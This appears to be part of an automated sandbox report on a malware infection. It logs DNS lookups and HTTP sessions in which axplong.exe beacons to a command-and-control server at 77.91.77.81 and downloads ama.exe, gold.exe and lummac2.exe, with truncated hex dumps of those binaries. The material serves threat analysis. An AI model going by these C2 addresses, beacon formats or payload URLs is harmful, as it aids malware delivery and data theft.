Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.108.25	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.107.33	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.172.145	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.206.65	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:34.486356020 CEST	1.1.1.1	192.168.2.5	0x5913	No error (0)	starjod.xyz		84.32.84.161	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:36.040862083 CEST	1.1.1.1	192.168.2.5	0x9139	No error (0)	findalltechs.xyz			65	IN (0x0001)	false
Jun 24, 2024 00:10:36.043236971 CEST	1.1.1.1	192.168.2.5	0xcefb	No error (0)	findalltechs.xyz		172.67.214.243	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:36.043236971 CEST	1.1.1.1	192.168.2.5	0xcefb	No error (0)	findalltechs.xyz		104.21.83.59	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:03.476370096 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:04.181277037 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:04.183563948 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:04.421395063 CEST	866	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 61 33 0d 0a 20 3c 63 3e 31 30 30 30 30 30 37 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 39 66 32 34 63 35 33 66 35 38 33 35 61 37 65 66 31 38 62 31 36 66 39 34 38 38 38 37 35 39 62 65 32 61 62 65 35 32 32 62 32 66 38 65 32 62 36 23 31 30 30 30 30 33 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 39 66 32 34 63 35 33 66 35 38 33 35 61 37 65 66 31 38 62 31 36 66 39 34 38 38 38 37 35 39 62 65 32 61 64 65 37 32 66 66 38 62 33 66 66 61 62 34 66 23 31 30 30 30 30 34 37 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 39 66 32 34 63 35 33 66 35 38 33 35 61 37 65 66 31 38 62 31 36 66 39 34 38 38 38 37 35 39 62 65 32 61 36 66 64 32 65 66 31 66 63 66 39 65 31 30 34 36 65 66 36 65 31 23 31 30 30 30 30 36 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 35 39 61 35 66 36 37 65 65 38 31 31 66 66 38 31 35 64 63 32 64 64 30 38 33 61 66 66 66 30 66 66 64 65 39 66 66 61 30 35 65 32 35 65 62 66 63 36 33 23 31 30 30 30 30 [TRUNCATED] Data Ascii: 2a3 <c>1000007001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2abe522b2f8e2b6#1000035001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2ade72ff8b3ffab4f#1000047001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2a6fd2ef1fcf9e1046ef6e1#1000064001+++aa0ed36554e19fbffd5744f59a5f67ee811ff815dc2dd083afff0ffde9ffa05e25ebfc63#1000091001+++aa0ed3651df49fa1a20b1eacd80f67bcdc4af9429f729aa1abe627eef8eda01232bcab407a7eda31815fd0bc68af9abab91295bce631970db7f900165b603dddb1132ddeafab5c298e490d5c7021a54d9b#1000092001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2a6ed24efb3ffab4f#1000094001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2bee930f7eaffb2416efcaa636b77#<d>0
Jun 24, 2024 00:10:04.426450014 CEST	49	OUT	GET /lend/ama.exe HTTP/1.1 Host: 77.91.77.81
Jun 24, 2024 00:10:04.650381088 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:04 GMT Content-Type: application/octet-stream Content-Length: 304128 Last-Modified: Sat, 22 Jun 2024 22:39:30 GMT Connection: keep-alive ETag: "667752a2-4a400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 54 ad b0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 02 00 00 d0 01 00 00 00 00 00 ba 9f 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 9f 02 00 4f 00 00 00 00 00 03 00 bc c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 0c 00 00 00 4c 9f 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxT0 @ @hOL H.text `.rsrc@@.reloc@B
Jun 24, 2024 00:10:04.650438070 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 9f 02 00 00 00 00 00 48 00 00 00 02 00 05 00 50 2a 01 00 44 74 01 00 03 00 00 Data Ascii: HPDtK01s%~%-&~[s&%(+o(8o)%rprYp~(+
Jun 24, 2024 00:10:04.650475025 CEST	1236	IN	Data Raw: 0a 7e d5 02 00 04 25 2d 17 26 7e cc 02 00 04 fe 06 63 03 00 06 73 48 00 00 0a 25 80 d5 02 00 04 28 06 00 00 2b 6f 63 01 00 06 00 11 07 11 06 fe 06 57 03 00 06 73 49 00 00 0a 7e d6 02 00 04 25 2d 17 26 7e cc 02 00 04 fe 06 64 03 00 06 73 4a 00 00 Data Ascii: ~%-&~csH%(+ocWsI~%-&~dsJ%(+oeXsK~%-&~esL%(+oi(+,dsk%o]%rp(7o_%sNoa%og%oi%sO
Jun 24, 2024 00:10:04.650527000 CEST	1236	IN	Data Raw: 11 07 11 07 6f 8a 01 00 06 28 44 00 00 0a 2d 09 11 07 6f 8a 01 00 06 2b 05 72 fd 02 00 70 6f 8b 01 00 06 00 11 07 11 07 6f 8c 01 00 06 28 44 00 00 0a 2d 09 11 07 6f 8c 01 00 06 2b 05 72 fd 02 00 70 6f 8d 01 00 06 00 11 07 11 07 6f 8e 01 00 06 28 Data Ascii: o(D-o+rpoo(D-o+rpoo(D-o+rpoorp([,o\Xo:+*AdzJzR
Jun 24, 2024 00:10:04.650609970 CEST	1236	IN	Data Raw: 04 2b 00 11 04 2a 00 41 4c 00 00 00 00 00 00 75 00 00 00 bc 00 00 00 31 01 00 00 05 00 00 00 13 00 00 01 00 00 00 00 42 00 00 00 26 01 00 00 68 01 00 00 06 00 00 00 1a 00 00 01 00 00 00 00 07 00 00 00 6a 01 00 00 71 01 00 00 06 00 00 00 1a 00 00 Data Ascii: +ALu1B&hjq0=sP%(YsZ(U(V,(sr-prp~(+o&8s%ooWo%
Jun 24, 2024 00:10:04.650643110 CEST	1236	IN	Data Raw: 00 0a 0b 06 17 58 0a 06 18 fe 02 0c 08 2c 05 00 07 0d 2b 15 00 03 07 6f 71 00 00 0a 16 fe 01 13 04 11 04 2d d6 07 0d 2b 00 09 2a 1b 30 03 00 57 01 00 00 0a 00 00 11 00 73 4e 00 00 0a 0a 00 73 72 00 00 0a 0b 1f 21 8d a5 00 00 01 25 d0 c3 02 00 04 Data Ascii: X,+oq-+0WsNsr!%(Y%(YososotsZrp~(+(u(vokrp(w(xoy%(Y"%(Yos
Jun 24, 2024 00:10:04.650681019 CEST	1236	IN	Data Raw: 00 0a 28 2b 00 00 0a 28 75 00 00 0a 6f 6b 00 00 0a a2 28 96 01 00 06 6f 2c 00 00 0a 13 04 38 c3 00 00 00 12 04 28 2d 00 00 0a 13 05 00 11 05 73 2e 00 00 0a 28 2f 00 00 0a 6f 30 00 00 0a 13 06 11 05 1f 1a 28 88 00 00 0a 6f 31 00 00 0a 2d 09 11 06 Data Ascii: (+(uok(o,8(-s.(/o0(o1-(+((2,+tsk%o]%soo_%(sog%sNoa%sOoc%sPoeoj,oQ(R:1
Jun 24, 2024 00:10:04.650713921 CEST	1236	IN	Data Raw: 72 29 04 00 70 7e 2a 00 00 0a 28 2b 00 00 0a 1c 8d a5 00 00 01 25 d0 8d 02 00 04 28 59 00 00 0a 73 5a 00 00 0a 72 33 04 00 70 7e 2a 00 00 0a 28 2b 00 00 0a 28 37 00 00 0a 28 55 00 00 0a 73 89 00 00 0a 0b 07 6f 8d 00 00 0a 16 fe 01 0c 08 2c 07 06 Data Ascii: r)p~(+%(YsZr3p~(+(7(Uso,t8R%r;p%r;p%r;p%%(YsZr=p~*(+9oo8oo8
Jun 24, 2024 00:10:04.650749922 CEST	1236	IN	Data Raw: 13 06 11 06 2c 20 06 11 05 1f 0a 59 1f 41 58 d1 13 07 12 07 28 9b 00 00 0a 28 9c 00 00 0a 28 37 00 00 0a 0a 2b 13 06 12 05 28 9b 00 00 0a 28 9d 00 00 0a 28 37 00 00 0a 0a 11 04 1f 09 fe 02 13 08 11 08 2c 20 06 11 04 1f 0a 59 1f 41 58 d1 13 07 12 Data Ascii: , YAX(((7+(((7, YAX(((7+(((7Xo.X]+,rp(7Xo:+&(*0-,+,+,
Jun 24, 2024 00:10:04.650785923 CEST	556	IN	Data Raw: 02 16 91 1f 18 62 02 17 91 1f 10 62 60 02 18 91 1e 62 60 02 19 91 60 0a 2b 00 06 2a 00 00 00 13 30 04 00 2c 00 00 00 1d 00 00 11 00 02 03 91 1f 18 62 02 03 17 58 25 10 01 91 1f 10 62 60 02 03 17 58 25 10 01 91 1e 62 60 02 03 17 58 25 10 01 91 60 Data Ascii: bb`b``+0,bX%b`X%b`X%`+0((+n bn`+0 (+X(+n bn`+b dm((m()n dm()mX()*zd
Jun 24, 2024 00:10:04.651515007 CEST	1236	IN	Data Raw: 8e 69 28 3a 00 00 06 00 00 2a 00 13 30 05 00 56 00 00 00 20 00 00 11 02 28 87 00 00 0a 00 00 03 14 fe 01 0a 06 2c 0c 00 72 4b 04 00 70 73 a5 00 00 0a 7a 04 14 fe 01 0b 07 2c 0c 00 72 61 04 00 70 73 a5 00 00 0a 7a 02 03 7d 01 00 00 04 02 0e 04 8d Data Ascii: i(:0V (,rKpsz,rapsz}}{(0!{ot+0.(,rgpszot}0u(,rgps

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:05.817243099 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000007001&unit=246122658369
Jun 24, 2024 00:10:06.532876968 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 24, 2024 00:10:06.537372112 CEST	50	OUT	GET /lend/gold.exe HTTP/1.1 Host: 77.91.77.81
Jun 24, 2024 00:10:06.752974987 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:06 GMT Content-Type: application/octet-stream Content-Length: 535080 Last-Modified: Sun, 09 Jun 2024 13:04:14 GMT Connection: keep-alive ETag: "6665a84e-82a28" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 89 a3 07 88 e8 cd 54 88 e8 cd 54 88 e8 cd 54 5b 9a ce 55 84 e8 cd 54 5b 9a c8 55 23 e8 cd 54 5b 9a c9 55 9d e8 cd 54 4a 69 c9 55 9a e8 cd 54 5b 9a cc 55 8d e8 cd 54 88 e8 cc 54 0a e8 cd 54 4a 69 c8 55 d4 e8 cd 54 4a 69 ce 55 90 e8 cd 54 7b 6a c8 55 89 e8 cd 54 7b 6a 32 54 89 e8 cd 54 7b 6a cf 55 89 e8 cd 54 52 69 63 68 88 e8 cd 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fe d4 64 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 5a 02 00 00 b8 05 00 00 00 00 00 e9 9c 00 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$TTT[UT[U#T[UTJiUT[UTTTJiUTJiUT{jUT{j2TT{jUTRichTPELdf'Zp@P@d<(& ("x@pt.textYZ `.rdatap^@@.data0@.rsrc@@.reloc(" $@B
Jun 24, 2024 00:10:06.753024101 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 20 f8 47 00 e8 9c 44 00 00 68 eb 68 42 00 e8 5e 8f 00 00 59 c3 6a 08 b8 bf 64 Data Ascii: GDhhB^YjdBKGE`GEeGHrBEh\|CPhlGNMhhBjdBTGEGEeTGpwBEhCPhGnNMhhB
Jun 24, 2024 00:10:06.753060102 CEST	1236	IN	Data Raw: c7 7c 16 7f 0e 3b f7 76 10 3b c7 7c 0c 7f 04 3b f1 76 06 2b f1 1b c7 eb 0e 0f 57 c0 66 0f 13 45 dc 8b 45 e0 8b 75 dc 89 45 ec 53 8d 4d d4 e8 a0 13 00 00 80 7d d8 00 75 0a 6a 04 5e 8b d6 e9 05 01 00 00 89 7d fc 8b 0b 8b 41 04 8b 44 18 14 25 c0 01 Data Ascii: \|;v;\|;v+WfEEuESM}uj^}AD%@t<E;\|3;v-HD@PL8<tsuEEEAL8WuuP$;EuE;uAE;\|3;v-HD@PL8<tuEEEj^j
Jun 24, 2024 00:10:06.753093958 CEST	672	IN	Data Raw: e8 8a 2f 00 00 83 c4 0c c6 04 2b 00 eb 34 56 57 51 50 53 e8 10 1a 00 00 8b f0 8d 4e 01 51 e8 de fe ff ff 53 ff 74 24 28 8b f8 89 5d 10 57 89 7d 00 89 75 14 e8 56 2f 00 00 83 c4 1c c6 04 1f 00 5f 5e 5d 5b c2 08 00 e8 fc 2d 00 00 cc 53 8b d9 b9 ff Data Ascii: /+4VWQPSNQSt$(]W}uV/_^][-SW\|$;wQjX;wjt${SCX.VQPWNQqOQt$${Ps.^_[-Vt$WNt"tFG2_^t$D$
Jun 24, 2024 00:10:06.753129959 CEST	1236	IN	Data Raw: 00 e8 60 41 00 00 8b 4c 24 2c 85 c9 74 23 8b 01 53 ff 50 08 8d 8e c8 00 00 00 8a d8 e8 45 41 00 00 8d 4c 24 0c e8 7a 29 00 00 8a c3 5b 5e c2 28 00 e8 c6 39 00 00 cc 51 53 8b d9 ba ff ff ff 7f 8b 4c 24 0c 8b c2 55 8b 6b 10 2b c5 3b c1 72 70 8b 43 Data Ascii: `AL$,t#SPEAL$z)[^(9QSL$Uk+;rpCVWR<)D$PW$NQ{\|$L$D$st$$t$$Uv3VPGPVDYYSPD$_^][Y*SV3SXX$jYtt$
Jun 24, 2024 00:10:06.753161907 CEST	1236	IN	Data Raw: 53 8d 4e 14 e8 24 03 00 00 8d 46 44 50 e8 a3 3e 00 00 8b 44 24 10 59 89 46 78 8b c6 88 5e 6c 89 5e 70 66 89 5e 74 88 5e 76 5e 5b c2 04 00 56 6a 01 8b f1 e8 28 02 00 00 ff 74 24 08 8d 4e 6c c7 06 bc 74 42 00 83 21 00 83 61 04 00 e8 0e fc ff ff 8b Data Ascii: SN$FDP>D$YFx^l^pf^t^v^[Vj(t$NltB!a^Vt$YPu^Vt$D$wBF^Vt$NwB!a^VWD$P&fD$$t$FL$tB
Jun 24, 2024 00:10:06.753197908 CEST	1236	IN	Data Raw: 89 5f 08 89 5f 0c 89 5f 10 e8 4b fe ff ff 83 ec 0c 89 5f 44 8b f4 89 5f 4c 8d 44 24 20 8b ce 50 89 1e 89 5e 04 e8 bf f4 ff ff 8b 44 24 28 8d 4f 50 89 46 08 e8 69 ff ff ff 8b 44 24 10 89 9f bc 00 00 00 89 9f c0 00 00 00 89 9f c4 00 00 00 89 9f b8 Data Ascii: ___K_D_LD$ P^D$(OPFiD$fGHt@L$t2_^[Vt$lHrB^Vt$TTrB^aaA\rBTrBVt$$ sB^aaA(sB
Jun 24, 2024 00:10:06.753230095 CEST	1236	IN	Data Raw: c7 06 38 73 42 00 5e c3 e9 1b 1b 00 00 8b 09 85 c9 74 06 8b 01 6a 01 ff 10 c3 56 8b f1 8d 46 34 c7 06 54 74 42 00 50 e8 be 32 00 00 8d 46 0c 50 e8 b5 32 00 00 59 59 c7 06 48 74 42 00 5e c3 56 8b f1 8b 06 90 85 c0 75 0b e8 9c 32 00 00 cc e8 30 46 Data Ascii: 8sB^tjVF4TtBP2FP2YYHtB^Vu20FNFP5Y^V1tj(VrYY^VWV4=~,Ytv,Y3~,9~$tv$uY~$9~tvdY~9~tvSY~9~tvBY~9~tv1Y
Jun 24, 2024 00:10:06.753268003 CEST	1236	IN	Data Raw: f1 c7 06 0c 77 42 00 e8 5e fa ff ff f6 44 24 08 01 74 0a 6a 10 56 e8 a7 6d 00 00 59 59 8b c6 5e c2 04 00 56 8b f1 e8 3f fa ff ff f6 44 24 08 01 74 0a 6a 0c 56 e8 88 6d 00 00 59 59 8b c6 5e c2 04 00 f6 44 24 04 01 56 8b f1 c7 06 fc 75 42 00 74 0d Data Ascii: wB^D$tjVmYY^V?D$tjVmYY^D$VuBthVemYY^D$VuBtj(VEmYY^V3D$thV#mYY^V6D$thVmYY^V\sBD$8sBtjVlYY^
Jun 24, 2024 00:10:06.753576040 CEST	1236	IN	Data Raw: f1 89 75 e8 83 65 fc 00 8d 8e 80 00 00 00 e8 56 fa ff ff c7 45 ec 01 00 00 00 6a 00 8d 45 ec 50 8b ce e8 25 10 00 00 83 4d fc ff e8 e5 6b 00 00 c3 6a 00 51 51 54 e8 a9 14 00 00 59 8b 4d e8 e8 6f 0f 00 00 b8 5c 34 40 00 c3 cc cc cc cc cc 55 8b ec Data Ascii: ueVEjEP%MkjQQTYMo\4@UVuvVYVM^],G3D$(SUVW\|$Ls8\|$Dj]t#{t6WKD$@tC3CEP{t{t9kuD$@uV,Y2L$8_^][3k,{
Jun 24, 2024 00:10:06.753616095 CEST	1236	IN	Data Raw: 01 ff 10 c3 83 c1 0c e9 b7 f1 ff ff 85 c9 74 06 8b 01 6a 01 ff 10 c3 8b 49 04 e9 9b 08 00 00 6a ff ff 71 04 8b 49 08 e8 fb 09 00 00 c3 83 c1 04 e9 97 f4 ff ff 8b 49 04 e9 e2 fa ff ff 8d 41 08 50 e8 93 e5 ff ff 59 c3 ff 61 04 c6 41 75 01 8d 41 70 Data Ascii: tjIjqIIAPYaAuApD\|$tPt$XQ)YUG3EAWPEfEPuEPT1MUEM3rfUAWPEfEPjEPEPj1M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:08.289482117 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000035001&unit=246122658369
Jun 24, 2024 00:10:08.943099976 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 24, 2024 00:10:08.946429014 CEST	53	OUT	GET /lend/lummac2.exe HTTP/1.1 Host: 77.91.77.81
Jun 24, 2024 00:10:09.156897068 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:09 GMT Content-Type: application/octet-stream Content-Length: 317952 Last-Modified: Mon, 10 Jun 2024 00:19:35 GMT Connection: keep-alive ETag: "66664697-4da00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 af 09 63 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c0 03 00 00 16 01 00 00 00 00 00 b0 92 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 f6 03 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 ec 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c f7 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELcf@@x0Q.text `.rdata7*,@@.data+@.relocQ0R@B
Jun 24, 2024 00:10:09.156923056 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 83 ec 30 8b 5d 0c a1 68 06 44 00 89 45 f0 90 90 90 90 90 90 90 Data Ascii: USWV0]hDEPPPPUCCCCCCe}ME1]E$lD1&$DE(@
Jun 24, 2024 00:10:09.156933069 CEST	1236	IN	Data Raw: df 8b 5d f0 08 c3 89 5d f0 88 1e 89 fb 31 c0 fe c9 0f 95 c0 ff 24 85 6c 06 44 00 8a 2b 43 31 c0 80 fd 66 0f 92 c0 ff 24 85 74 06 44 00 31 c0 80 fd f0 0f 92 c0 ff 24 85 7c 06 44 00 31 c0 80 fd f2 0f 92 c0 ff 24 85 84 06 44 00 31 c0 80 fd f3 0f 92 Data Ascii: ]]1$lD+C1f$tD1$\|D1$D1$D$DE@(]]1$lD16$D1>$D1d$D1>$D1g$D$D
Jun 24, 2024 00:10:09.156944036 CEST	1236	IN	Data Raw: 90 90 90 81 ce 00 30 00 00 8b 45 0c 89 70 18 ff 25 d8 07 44 00 8b 45 d4 89 55 f0 ff 24 85 ec 07 44 00 31 c0 80 7d e8 d9 0f 93 c0 ff 24 85 f4 07 44 00 31 c0 80 7d e8 e0 0f 92 c0 ff 24 85 fc 07 44 00 0f b6 45 e8 04 27 31 c9 80 7d e0 03 0f 94 c1 ff Data Ascii: 0Ep%DEU$D1}$D1}$DE'1}$DM%DCC%DEMquLDMCM(D$,D 1mM$4D1
Jun 24, 2024 00:10:09.156955004 CEST	448	IN	Data Raw: 00 02 ff 25 b8 0a 44 00 89 d0 c0 e8 04 24 01 0f b6 c8 b0 04 ff 24 8d bc 0a 44 00 31 c9 80 7d d8 06 0f 94 c1 b0 02 ff 24 8d 9c 0a 44 00 8b 4d d0 88 01 8d 4b 02 31 c0 80 7d e0 03 0f 95 c0 ff 24 85 c4 0a 44 00 31 c0 80 7d d8 04 0f 94 c0 ff 24 85 cc Data Ascii: %D$$D1}$DMK1}$D1}$D$DC%D}wAGW%D}wAGWwAGW%DW$G1<$DE$$D%DE%
Jun 24, 2024 00:10:09.157017946 CEST	1236	IN	Data Raw: 25 40 0b 44 00 01 cb 0f b6 c2 89 c1 c1 e9 02 83 e1 04 8b 75 dc ff a1 4c 0b 44 00 bf 01 00 00 00 31 d2 0f b6 4d e0 ff 24 95 a4 09 44 00 8a 6d e8 ff 24 bd ac 09 44 00 83 ce 40 8b 45 0c 89 d7 89 c2 89 70 18 0f b7 01 66 89 42 14 01 cb 89 f8 0f b6 c0 Data Ascii: %@DuLD1M$Dm$D@EpfBuLDTDMdDIQNE\DHfHE+1$DIfQxD
Jun 24, 2024 00:10:09.157030106 CEST	1236	IN	Data Raw: 00 e8 75 6d 00 00 83 c4 0c 85 c0 0f 85 68 ff ff ff 83 c5 05 89 2e 6a 10 ff 15 cc 0b 44 00 83 c4 04 31 c9 85 c0 0f 85 45 02 00 00 31 db e9 47 ff ff ff c7 44 24 18 00 00 00 00 8d 54 24 18 89 f1 e8 46 0f 00 00 31 db 85 c0 0f 84 2a ff ff ff 89 c6 8b Data Ascii: umh.jD1E1GD$T$F1*\|$jD:@pxjD@jD(@@@E.}[L$yt1$GE.]
